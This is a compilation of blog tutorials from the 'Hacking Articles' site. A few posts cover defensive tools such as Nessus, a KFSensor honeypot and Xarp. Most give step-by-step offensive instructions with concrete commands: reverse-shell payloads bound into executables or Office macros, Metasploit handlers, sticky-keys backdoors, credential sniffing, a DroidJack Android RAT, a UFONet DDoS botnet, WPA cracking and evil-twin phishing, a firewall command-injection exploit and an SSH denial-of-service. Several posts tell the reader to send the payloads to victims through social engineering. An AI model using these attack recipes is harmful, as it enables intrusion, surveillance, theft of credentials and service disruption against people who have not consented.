Every hackers or information security person is incomplete without a vulnerability scanner, especiallywithout Nessus vulnerability scanner. Because Nessus is a very powerful tool and world’s most popular vulnerability scanner and used by many companies and security professionals and also because it is free for personal use.

Nessus scans for following vulnerabilities:

• Vulnerabilities that allow remote access.
• Misconfiguration
• Weak passwords
• DOS (Denials of service) attack.
• Help in PCI DSS (Payment Card Industry Data Security Standard) audits.
• Mobile device audits
• Customized reporting

 Installing Nessus

 Well, Nessus supports many different types of OS (Operating System) like different version Windows and Linux, Free BSD, Sun Solaris, etc.

So in this article, I’m using windows for installing Nessus.

You can download Nessus from here </ Nessus>

Download and install Nessus after that automatically Nessus will open in your browser with https://locahost:8834 address if not then open your browser and type this address to setup Nessus. Click Continue

Create an account with administrator rights. You can also create more user accounts with administrative privilege account.

Now select your registration type and give Activation code which you will receive on your email account when you register and download Nessus from the official website.

Then click continue.

After that Nessus will start Downloading required things to perform a scan. It will take few minutes to complete if you have good internet speed.

After downloading and installation you will see Nessus web interface, where you will perform different types of scans.

To perform a scan click on New Scan.

Now there are many preset scanning templates for different types of environment.

Well, these are policies; on the basis of policy, we scan a network, cloud Infrastructure, web application and much more.

You can also create your own customized policy to perform scan according to your own requirement.

To create a customized policy click on Policythen click on New Policy.After that setting menu will appear here you have to set what you want to scan, ports, etc. Some of the policy required credentials to perform scan so, you have to provide credentials also.

Like here I created a policy for PCI DSS scan.

Like this you can create customized policy.

So now to perform a scan click on Scans and then New scan. After that select a preset template or you can also select, your customized policy to perform a scan. Here I’m selecting Advance Scan.

Now give a name to this scan, if you want to write some note related to this Vulnerability scan then type in Description section and then type the IP address of the target to perform vulnerability scanning. You can give a range of IP addresses also. Here we are performing a network vulnerability scanning.

Finally, LAUNCH you scan.

 After few minutes, Nessus will tell you about the vulnerabilities in your network. As you can see here Nessus found many vulnerabilities in one of my server in the network.

Basically Nessus uses the “Standard” CVSS (Common Vulnerability Scoring System) base for vulnerability scoring.

Here you can see Nessus found UnreallRCd Backdoor vulnerability and marked as CRITICALand CVSS score is 10.0. And exploits are also available online for this vulnerability.

Nessus also found Samba Badlock Vulnerability and marked as MEDIUM and CVSS score is 6.8. Even for this vulnerabilityexploits are available online.

In Remediation section, Nessus will tell you few countermeasures to protect and solve vulnerability on the network.

Author: AkshayBhardwaj is a passionate Ethical Hacker | Information Security Researcher | Technical writer. You can follow him on LinkedIn and Facebook

The post How to identify Network Vulnerabilities using Nessus (Beginner Guide) appeared first on Hacking Articles.

Waybackpack is a command-line tool that lets you download the entire Wayback Machine archive for a given URL

Open your Kali Linux terminal and go to desktop and type the following command

git clone https://github.com/jsvine/waybackpack.git

Now go the waybackpack folder and type the following command

pip install waybackpack

Now run the following command to view any website for the particular year and save the result in .html format in the desired folder.

In example below I’m using hackingarticles.in for the year 2010 and saving the result in /Downloads/hacking-wayback

Now you will see the saved file in the desired folder.

See the result below

The post Find Your Website History using Waybackpack appeared first on Hacking Articles.

In the previous article, we have seen that how KFSensorHoneypot IDS detects any unauthorized person by simulating vulnerable system services. Well, vulnerability to a hacker is like jewels. Every hacker or malicious person  fist face of hacking is Footprinting and second is scanning where they get to know whether a system is vulnerable for performing an attack or not. So in this article, we will detect an unauthorized person or a hacker and stop it.

Install and start KFSensorHoneypot IDS server to do this read my previous article

http://www.hackingarticles.in/detect-hacker-network-using-kfsensor-honeypot

Here my KFSensorHoneypot is ready.

Scanning phase tells us whether systems is vulnerable or not and sometimes even provide us exploit information which is available for that vulnerability. So every of the hacker performs this step before exploiting your system.

 So here I try to scan my system running KFSensor with Nessus vulnerability scanner from another computer.

As you can see Nessus started scanning my system and finding the vulnerability.

Here you can see that KFSensorHoneypot IDS alerted you that someone is trying to scan your system for vulnerability and some of the packets your system is receiving are malicious and recorded attackers IP address.

Now I’m trying to scan my system with GFI Languard also to see that KFSensorIDS detect or not.

GFI Languard started scanning.

Here KFSensorHoneypot IDS alerted that someone is sending packets to get vulnerability of the system. Here you can monitor attacks on every TCP and UDP ports. Even you can see ICMP or ping messages.

Here you can see that someone is trying attacking on Port and his IP address is 192.168.149.1

You can also view alerts by visitor’s means which IP address is trying to access on which ports.

KfsensorHoneypot IDS can also detect whether someone is using a Vulnerability scanner or not to perform an attack on your system. Now we know that particular IP address is sending to many packets which are not good. So to block that IP address we have to create a separate policy for that visitor.

To do that double-click on IP address you want to block accessing your system, a menu will appear

Now click on details.

Here click on Create Visitor Ruleto create a policy.

After that select port, you want to block for that IP address and select actions Close or Ignore all requests from that particular IP address.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Technical writer. You can follow him on LinkedIn and Facebook

The post Detect Vulnerability Scanner in Network using Kfsensor appeared first on Hacking Articles.

First clone cypher repository from github, to do so type:

git clone https://github.com/xan7r/cypher.git

Now choose an executable file and copy to cypher folder to bind the cypher with any .exe file

Here in my case I have copied putty.exe as a file to bind with cipher

Note: only executable file can be binded.

Now run the following command

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0

Specify payload.  Default shell_reverse_tcp.  Valid values are:

0 – windows/shell_reverse_tcp

1 – windows/meterpreter/reverse_http

2 – windows/meterpreter/reverse_http +PrependMigrate

3 – windows/meterpreter/reverse_https

4 – windows/meterpreter/reverse_https +PrependMigrate

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Start metasploit using msfconsole

use exploit/multi/handler

set payload windows/shell_reverse_tcp

set lhost 192.168.0.105

set lport 4444

exploit

Now send the binded putty_evil .exe to the victim, as soon as he opens the file a shell session will open

The post Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files) appeared first on Hacking Articles.

This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server; send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

• Connects to RDP using rdesktop
• Sends shift 5 times using xdotool to trigger sethc.exe backdoors
• Sends Windows+u using xdotool to trigger utilman.exe backdoors
• Takes screenshot
• Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session enable the remote desktop option of remote pc using following exploit

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In Next step replace the sticke key with command prompt using following exploit

msf > use post/windows/manage/stickey_keys

msf post(stickey_keys) > set session 2

msf post(stickey_keys) > exploit

Now clone Sticky Keys Hunter repository from github, to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

For scan a single host: ./stickyKeysHunter.sh 192.168.0.120

Now a pop will open like below

Now press shift key 5 times at the login screen now a command prompt will open up

Now you can do anything in victim pc through command prompt. I am using net user command to see the list of active account

The post Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter appeared first on Hacking Articles.

Note: In my case this trick works for only Internet Explorer users

Bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

Go to Kali Linux terminal and type:

git clone https://github.com/evilsocket/bettercap.git

it will clone bettercap from github and store it in your root directory

After that change your directory. Now it’s time to install bettercap and its dependencies, it will use Ruby gems to install all its required dependencies.

 To install type:

gem build bettercap.gemspec

Now type:

sudo gem install bettercap*.gem

it will install bettercap and all its dependencies using gem

Now we have installed Bettercap and start sniffer for sniffing in network.

Type in terminal:

bettercap –proxy -P post

Here you can see the hacked facebook account and victim’s username and password.

See the example below :

The post Hack Gmail and Facebook Password in Network using Bettercap appeared first on Hacking Articles.

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

first clone WPXF repository from github, to do so type:

https://github.com/rastating/wordpress-exploit-framework.git

now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/refelex_gallery_shell_upload

wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /

wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/ refelex_gallery_shell_upload] > run

The post Penetration Testing in WordPress Website using WordPress Exploit Framework appeared first on Hacking Articles.

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec’s most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Firstly install the Brosec tool in your Kali Linux. Follow the below steps one by one:

Reference:

https://github.com/gabemarshall/Brosec

• apt-get install npm build-essential g++ xsel netcat Install dependencies
• npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
• npm install -g n Install n (nodejs version manager)
• n latest Install latest version of nodejs
• git clone https://github.com/gabemarshall/Brosec.git – Clone Brosec repo
• cd Brosec && npm install – cd into the directory and install npm depdendencies

After that start Brosec by typing in terminal:

./bros

It will show you menu options.

Now set the IP of your localhost :

set lhost 192.168.0.111

Now set the lport :

set lport 4444

After setting the localhost and lport, choose option 5 Miscellaneous.

You will see 2 options Reverse Shells and Exfiltration. Now select option1 Reverse Shells, see the image below:

After choosing the option Reverse Shells, you will see 5 options. In my case I’m selecting option 4 Reverse Shell PSH

Now it will show you a message Should I start a netcat listener for you?

Press Y to start the netcat listener. It will generate a powershell script, see the below picture.

And copy this code in text editor and save it with .ps1 (powershell extension)

Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get the session of the victim’s PC. See the picture below for reference.

Now you can use the systeminfo command to get the information of the victim’s PC.

The post Hack Remote PC with Reverse PowerShell using Brosec appeared first on Hacking Articles.

BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets. 

 First clone BrowserBackdoorServer repository from github, to do so type:

https://github.com/IMcPwn/browser-backdoor.git

 Follow the below steps one by one:

cd client

npm install

Now go to the client folder and open index.html file in leafpad and edit the following line now type your kali Linux ip screenshot is given below.

After finishing the above task it will create the Browser backdoor script folder for windows and Linux users

Now type the following command step by step

npm install electron-packager -g

electron-packager . –all

Now go to the server folder in browser-backdoor directory and the following command

Bundle install

After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send the Brwoserbackdoor-win32-x64 to the victim using any social engineering method when the victim clink on BrowserBackdoor file you can get the victim session example are given below.

Now type the session command to check the active session it will show you the session with id no.

Type the target command with session id to interact with current session sees the following example

Target 0

 Now if you want to more option type the help command you can get the list of all available command

The post Hack Remote PC using BrowserBackdoor – JavaScript WebSocket Backdoor appeared first on Hacking Articles.

Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges Nmap XML file with Metasploit and generates a resource script containing matching Metasploit modules. that you can run against the target servers.

first clone Metasploithelper repository from github, to do so type:

git clone https://github.com/milo2012/metasploitHelper.git

Now open the terminal and scan the target with nmap and store the results in a xml file.

Here the target is 192.168.0.126 and the results are stored in 126.xml file.

nmap -sV -oX 126.xml 192.168.0.126

Now enter in the metsploithelper folder and open the metasploitHelper.py with leafpad

Now change the path in above file to the “/usr/share/metasploit-framework/modules/”

Now run metasploitHelper giving output of the nmap stored above as an input.

python metasploitHelper.py -i 126.xml

The above command will generate two rc scripts namely runAux.rc and runExp.rc.

runAux.rc contains the auxiliary modules and runExp.rc contains all the exploit modules .

Now give those scripts as input to the msfconsole .first we will give runAux.rc for using auxiliary modules by command.

msfconsole  -r  runAux.rc

Now ,if a auxiliary module is successful it will show us the result, like in my case it found the vnc login password of the target machine.

Now we will run thr runExp.rc script to run all the exploits found by the metasploitHelper.

 msfconsole -r runExp.rc

Now if there is a exploitable vulnerability in target machine it will exploit it and give the shell or meterpreter depending upon the exploit. like in my case ,it exploits the vsftpd vulnerability to get a reverse shell. Now we can run any command depending on the OS.

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Automating Exploitation of Remote PC using Metasploithelper appeared first on Hacking Articles.

Remember: this tool is NOT for educational purpose.

Usage of UFONet for attacking targets without prior mutual consent is illegal.

It is the end user’s responsibility to obey all applicable local, state and federal laws

UFONet – is a free software tool designed to test DDoS attacks against a target using ‘Open Redirect’ vectors on third party web applications like botnet

Features

• Auto-update
• Clean code (only needs python-pycurl)
• Documentation with examples
• Web/GUI Interface
• Proxy to connect to ‘zombies’ (ex: tor)
• Change HTTP Headers (User-Agent, Referer, Host…)
• Configure requests (Timeout, Retries, Delay…)
• Search for ‘zombies’ on google results (using a pattern or a list of dorks)
• Test ‘Open Redirect’ vulnerabilities on ‘zombies’
• Download/Upload ‘zombies’ from Community
• Inspect a target (HTML objects sizes)
• Set a place to ‘bit’ on a target (ex: big file)
• Control number of rounds to attack
• Apply cache evasion techniques
• Supports GET/POST
• Multithreading
• Different search engines for dorking
• Web interface
• Geomapping / Visual data
• Order ‘zombies’ to attack you for benchmarking

First of all download UFONet from sourceforge by  this link:

https://sourceforge.net/projects/ufonet/

and extract it and enter the folder and open up the terminal and now list all the options available with this command ./ufonet  –help

Now we have to download all the zombies that will be used for attack.Open the terminal and type:

./ufonet  –download-zombies

Now type the following command for using the GUI version:

./ufonet  –gui

The above command will open a browser with GUI options .Click on START MOTHERSHIP.

Now it will open up a GUI with different options.

Now click on Botnet option.

Clicking on Botnet will give many options to configure.

Now clicking on List Zombies will list all the Zombies it will be using for the attack.

Now click on Attack option.

Set the target to your target URL or your target IP and set the number of rounds as per your need and click on start for the attack.

As you can see first round of attack is started from multiple zombies and after a time the host  will be down.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets

The post How to Create Botnet for D-Dos Attack with UFONet appeared first on Hacking Articles.

Airgeddon is a multi-use bash script for Linux systems to audit wireless networks.

Features

• Interface mode switcher (Monitor-Managed).
• DoS over wireless networks with different methods.
• Assisted Handshake file capture.
• Cleaning and optimizing Handshake captured files.
• Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
• Compatibility with many Linux distros (see requirements section).
• Easy targeting and selection in every section.
• Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
• Multilanguage support and autodetect OS language feature (see supported languages section).
• Help hints in every zone/menu for easy use.
• Auto-update. Script checks for newer version if possible.

First of all clone  airgeddon from git by executing the following command on the terminal:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Now to launch airgeddon enter the cloned folder and execute command:

./airgeddon.sh

After execution it will take some time to check if all the tools are installed  and then press Enter when asked.

Now it will ask you to select an interface .Select  wlan0  for wifi attacks as in my case I have selected 2.

After selecting wlan0 it will give many other options to choose .You have to select option 2 to enter into the monitor mode which puts the wlan0 interface in monitor mode to listen to all the available wifi connections  and then press ENTER key to continue further.

Now  again it will give some new options and you have to select option 5 to enter Handshake tools menu.

Now it will present you with more options  , now select option 5 to start capturing handshake and press ENTER when asked .Then it will again ask you to press ENTER for selecting the target so press ENTER. 

Now it will open a new window showing you the list of available targets  .Wait till your target wifi appears and then  hit ctrl^c.

Now it will show you the available target list, so select your target by entering the id  NO. given in the N column.  I have selected the network Tenda_3  by entering  6.After that press ENTER to continue.

Now it will ask to choose the attack type so select  2 for Deauth  aireplay attack which will first use deauth attack to disconnect all the client and then capture the handshake between the router and the client .Again  press ENTER to continue which will open two windows. 

As you can see below  two windows will open ,one is deauth attack window and otrher is capturing handshake .You have to wait till the WPA Handshake appears on the top right side of the window and then hit ctrl^c.

Then it will ask if you get the handshake ,so press y for YES and then it will ask the path of the capture file which is default set to the last capture so just press ENTER .

 Now you have to return to the main menu by pressing  7

Now you have to crack the password by selecting the 6 option.

Now it will ask to select a attack for breaking the password ,we will select dictionary attack to use a dictionary  and then it will  ask if you want to use already selected  BSSID so press  y and then it will ask to use the already selected BSSID so press y and it will again ask the path of dictionary file .Here you can give your custom made dictionary or default dictionary present in the kali .I have used password.lst in the  /usr/share/nmap/nselib/data/passwords.lst and then press ENTER key to continue.

Now it will start cracking with aircrack-ng and if the password is present in the dictionary it will show you the password  as you can see that KEY FOUND[87654321].

The post Hack Wireless Network using Airgeddon appeared first on Hacking Articles.

Fluxion is a remake of linset by vk439 with less bugs and more features. It’s compatible with the latest release of Kali (Rolling).

How it works

• Scan the networks.
• Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
• Use WEB Interface *
• Launch a Fake AP instance to imitate the original access point
• Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
• A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted.

First  of all clone Fluxion from github with command :

git clone https://github.com/deltaxflux/fluxion.git

And execute the script from its folder with command:

./fluxion

After starting it will ask for choosing the interface so select wlan0 by ENTERING 1 and then it will ask you to select the channel to listen to wifi connections so enter 1 to listen to all wifi connections.

It will open a new window for wifi monitoring so wait till your target appears and hit ctrl^c.

Now it will show the list of available targets so select the target by pressing the id no. of that connection as in my case i have selected ttpl by press 2.

Now select option 1 for creating fake AP (access point) and press ENTER.

Now press ENTER to skip and then select 1 for choosing aircrack-ng from handshake checking options.

Now select option 1 to Deauthenticate all clients connected to the target wifi

After selecting 1 it will open 2 windows, one for capturing WPA handshake and other for deauthenticate all clients. Now enter 1 on the MENU window to check handshake without closing the other windows.

After checking handshake it will ask for choosing the Web Interface, so select 1 and press ENTER.

Now it will ask for choosing the language, so select 1 for ENGLISH and press ENTER.

Now it will open 4 windows starting the fake AP and deauthenticating the clients of the wifi network.

Now the fake AP is started and the clients will not be able to connect to the original wifi and will be forced to connect to our fake AP and when the client will open a browser it will be redirected to a login page asking for the WPA password

When the user will enter the correct WPA password all the attacks will be stopped and the password will be shown as in my case KEY FOUND [rajchandel12345].(ATTACKS WILL ONLY  STOP WHEN THE CLIENT WILL ENTER CORRECT PASSSWORD)

The post Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack) appeared first on Hacking Articles.

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern comes preinstalled in the kali linux , so go to Applications and then to Wireless attack and then click on fern wifi cracker.

Now click on select interface and select the wireless interface which will put it into monitor mode to listen to all the wifi AP’s nearby. Now click on Scan for Access points.

After scanning it will show the WEP and WPA secured wifi separately but in my case there is no WEP so it is showing  5 WPA secured wifi  so click on WPA tab. 

Now it will show all the WPA wifi and select your target by clicking on it as in my case I have selected ttpl as my target and now select dictionary by clicking on BROWSE on lower right hand corner.  

Now select your dictionary from your system .I has selected nmap.lst from /usr/share/wordlists/ directory and then click on open. (YOU CAN USE YOUR CUSTOM MADE WORDLIST OR ANY OTHER)

Now select Regular attack and then click on WIFI ATTACK on top right hand corner.

Now it will prompt with WPA ATTACK REQUIREMENT as at least 1 client is required to be connected to the target AP, so click OK on it.

Clicking on OK will start the attack by first deauthenticating the client and then capturing handshake and then breaking the encryption which will lead to successful breaking of the password if it is present in your dictionary. In my case it has successfully found my password as WPA KEY:rajchandel12345

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Cracking WiFi Password using Fern WIFi Cracker appeared first on Hacking Articles.

DroidJack is an android RAT which gives you the power to establish control over your victim’s Android devices with an easy to use GUI and all the features you need to monitor them.

First of all download DroidJack  from http://droidjack.net

Now execute the DroidJack which is a executable jar file . Then it will prompt you for login , so enter your username and password .

Now clicking on unlock button will open a GUI interface .

Now click on Generate APK and then edit App Name and File Name with the name of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and enter the port no. of your system in the Port Number field and then click on Generate.

After some time it will generate a prompt showing that the APK is successfully generated and can be found in the same folder as your DroidJack application.

So now go to Devices and set the port field in the lower left corner to the same port with which you have generated the APK as in my case it is 1337 and then click on Reception  to start the listening mode.

Now send the apk RAT to your victim by any means .

After installing the app ,when the victim click on button we will get the android session. 

As you can see below the phone is  listed in Devices list.

Now right clicking on the mobile device will give a list of options which you can use.

Now for demo purpose i  have used SMS  Trekker and as you can see it has dumped all the SMS.

AUTHOR: Sahil Gujjar is an information security enthusiast and technical writer

The post Hack Any Android Phone with DroidJack (Beginner’s Guide) appeared first on Hacking Articles.

First start the monitor mode on our wireless adaptor .

airmon-ng start wlan0

Now the monitor mode is enabled with name wlan0mon.

and then with the following command start listening to all the available wifi connections:

airodump-ng wlan0mon

After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c.

Now we have to listen to a specific channel on which the target is present . Now run command:

airodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon

-c == channel number of the target (2 in my case , see the CH column)

–bssid == MAC address of the target AP

–write == name of the capture file

Now wait till the WPA handshake is captured and then hit crtl^c.

Now a file named sommay-01.cap will be generated

PYRIT

First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file in our case  it is the path to dictionary

-r ==  path to the captured fle which ( in our case it is sommay-01.cap)

attack_passthrough == this options is to specify that a dictionary attack is to be performed

As you can see it has successfully cracked the password.

OCLHASHCAT

First of all download oclhashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file we captured with airodump-ng previously  to .hccap with aircrack-ng  by command:

aircrack-ng sommay-01.cap -J sommay-01

-J == the path to the output file with extension .hccap

Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

In above command if you are using 32 bit system replace 64 with 32.

-m is the hash type  which is 2500 for WPA/WPA2 cracking

then give the path to .hccap file which you converted with aircrack-ng. and then the name of the dictionary file. As you can see it has successfully cracked the password.

COWPATTY

For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID(Name) of the target AP(The name should be identical to the target AP)

Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.

Now run command :

cowpatty  -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP(The name should be identical to the target AP)

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post 3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty appeared first on Hacking Articles.

Xarp is an advanced anti spoofing tool that flags all the spoofing attacks that might be using ARP(address resolution protocol) targeting your system. This includes documents, emails and VoiceIP conversations.  ARP attacks allows hacker to manipulate the data sent over the network. Xarp uses active and passive modules to detect hackers inside the network. Having such tools in the system is very important as the computer firewalls and OS security do not provide protection against ARP attacks.

Download latest Xarp version from http://xarp.software.informer.com/download/

After it gets downloaded, install it in your computer. Now,we will perform an attack on a system with Xarp installed  To show this tool’s effectiveness, we perform the attack with Bettercap

As soon as Xarp detects an ARP attack, it shows an alert on the screen like this.

 It is to be noted that there was no such alert or blocking from both windows firewall and defender, but Xarp detects the intrusion and warns about it.

Author- Shivam Yadav is a certified ethical hacker, an enthusiast and a researcher in this field.

The post How to Detect Sniffer on Your Network appeared first on Hacking Articles.

Untangle’s NG Firewall enables us to quickly and easily create the network policies that deliver the perfect balance between security and productivity.

 Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit. A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy.

 First of all clone the the github repo of the exploit and enter in the directory with command:

git clone https://github.com/3xocyte/Exploits && cd Exploits

 and now give the python script permission to execute with command:

 chmod +x untangle-ngfw-12.1-ci.py

Now set the netcat listener at port 443  for ssl connection in a new terminal with command:

 ncat  –ssl  -nlvp 443

Now execute the python script with command:

 python untangle-ngfw-12.1-ci.py  192.168.2.1   192.168.2.3  admin  admin

 Here 192.168.2.1 is the Untangle firewall IP and 192.168.2.3 is our system IP and username , password of the Untangle Firewall are admin , admin .

As soon as the above command is successfully executed we get the reverse shell.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post Hack Untangle NG Firewall using command Injection Vulnerability appeared first on Hacking Articles.

Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.

To install veil-evasion on your kali linux, type :

apt-get install veil-evasion

 After the installation completes, run veil-evasion with the following command on terminal, in the installed directory of veil-evasion:

veil-evasion

To see the options of payloads type

list

We can see a menu of the available payloads to use. There are plenty of payloads to use.

We will be using the payload id-23. We type the command:

>use powershell/meterpreter/rev_https

Reverse https is used here just so in case if the victim’s PC has a firewall enabled for TCP, considering the most common situations where HTTPS is not blocked on PC.

After that set local host(Your PC’s IP). In my case it is 192.168.0.105. Hence:

>set lhost  192.168.0.105

And then generate the payload:

generate

Enter the name of file. Let the name of file to be generated be raj. Therefore;

raj

Now, the Veil-Evasion tool has created a bat file in powershell code in the directory:

/var/lib/veil-evasion/output/source/raj.bat

Open a new window of terminal and install MacroShop. MacroShop is a collection of scripts to aid in delivering payloads via Office Macros. Most are Python. To install it we type:

git clone https://github.com/khr0x40sh/MacroShop.git

After the installation of MacroShop, open its installed folder and place the file “raj.bat” in that directory.

Once the file “raj.bat” is placed in MacroShop, change the terminal path to MacroShop(or right click on the installed directory and click open in terminal and type:

python macro_safe.py raj.bat file.txt

Here file.txt is the name of output text file that MacroShop will create.

Now open windows->New Microsoft  Office Excel Worksheet->view(on the top bar)->macro

Enter the macro name->create

Then in the Macro editing area(or the workbook) copy paste the code present in “file.txt” to the workbook and save macro.

Now, edit the Microsoft excel worksheet so as to make it look authentic and edit it in such a way that the victim should definitely enable Macro option( given it is disabled).

Just for the case of simplicity and tutorial, I enter something random and save it as Microsoft Excel document 97-2003.

Open the excel document again, and enable macro option(if disabled).

Meanwhile, open metasploit on kali linux

msf>use exploit/multi/handler

msf exploit(handler)>set payload windows/meterpreter/reverse_https

msf exploit(handler)>set lhost 192.168.0.105

msf exploit(handler)>set lport 8443

msf exploit(handler)>exploit

 As soon as victim clicks on enabling the macro and/or opens the excel document, Voila! We get the meterpreter session. Hence, job is done.

Author: Harshit Rajpal is an InfoSec researcher and has a keen interest in technology. contact here

The post Hack Remote PC using Microsoft Office Files (Macro Payloads) appeared first on Hacking Articles.

OpenSSH (also known as OpenBSD Secure Shell) is a suite of security-related network-level utilities based on the Secure Shell (SSH) protocol, which help to secure network communications via the encryption of network traffic over multiple authentication methods and by providing secure tunneling capabilities.

OpenSSH was designed to evade various attacks like MITM , eavesdropping by encrypting all the traffic but an attack known as User-Enumeration Time Based Attack was discovered which helps in effectively increasing the brute force attack efficiency by guessing the usernames firsthand as in a Brute Force attack two fields are required Username and Password and we will be able to guess the Username correctly thus decreasing the time required for Brute Force Attack as of now only Password field is to be Brute Forced.

Osueta a simple Python script was developed to exploit the OpenSSH User Enumeration Timing Attack.(found in 5.* and 6.* versions of the *nix systems)

HOW THIS WORKS??

When we want to connect to a SSH server we have to provide a Username and a Password so first it is checked if the Username exists or not then:

1.) If the Username doesn’t exist the password is not compared to original one.

2.) If the Username exist the password is compared to original one by comparing the hash of the given password , if it is correct you are granted access .

3.) Now suppose a username exists and we are using a very long password suppose of length 40000 bytes which is the default length used by osueta  (like 40000 S) so the hash of the given password has to be generated to compare it with the original one as a result the system slows down and the time measurement is increased which is the key as it tells us that username exists.

First clone the github repo with the terminal command:

git clone https://github.com/c0r3dump3d/osueta.git

Now change your directory to osueta and run the following command:

python osueta.py –H 192.168.222.136 –U pp –p 22

-H (Openssh server host i.e. victim IP –192.168.222.136 in my case)

-U (any guessed username which can be present on the victim machine – pp in my case)

-p (port no. of the running ssh service – 22 in our case )

Firstly it checks if the given port  is open or not and then service banner is detected to know the version of the running ssh server.

Now it generates 10 random usernames to try against the target server to test the time measurement of the server i.e. test the delay time of the server . After that it test the server with provided username and if there is delay in user authentication then the user exist as in my case the user pp exists on the target server.

We can also pass a list of users as the input to check against all the usernames in the list with command:

./osueta.py –H 192.168.222.136 –L users.txt –p 22

-L (users input file –users.txt in my case)

As in my case it has successfully enumerated the following username from the given list

pp

root

him

We can also create a DOS(Denial Of Service) like situation on the target server with the command:

./osueta.py –H 192.168.222.1376 –p 22 –U pp –v no –dos yes

–dos (if you want to create a DOS situation -yes)

Now firstly it will detect if the given user exists if yes then it generates a lot of connections to the target server and when the number of sessions is reached the target server starts to reject the rest of the connections causing a DOS.

As you can see the target server is denying any connection when i try to connect with it.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post OpenSSH User Enumeration Time-Based Attack with Osueta appeared first on Hacking Articles.